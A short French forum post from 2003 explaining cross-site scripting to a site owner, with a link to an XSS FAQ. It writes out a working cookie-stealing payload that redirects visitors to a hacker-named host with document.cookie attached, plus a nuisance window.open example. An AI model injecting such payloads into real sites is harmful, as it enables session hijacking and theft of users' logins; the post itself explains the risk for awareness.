Cross site scripting (XSS) :
<script>document.location='http://www.lesiteduhacker.com/cookie.cgi? '%20+document.cookie</script>
permet d'envoyer sur le site du vilain les cookies utilisé pour ton site, le plus interressant étant évidemment login et mots de passe, identifiant de session.
Sinon, une connerier du genre :
window.open (document.location)
Toujours pénible
FAQ XSS : http://www.cgisecurity.com/articles/xss-faq.shtml
Message édité par kadreg le 23-03-2003 à 17:52:48
---------------
brisez les rêves des gens, il en restera toujours quelque chose... -- laissez moi troller sur discu !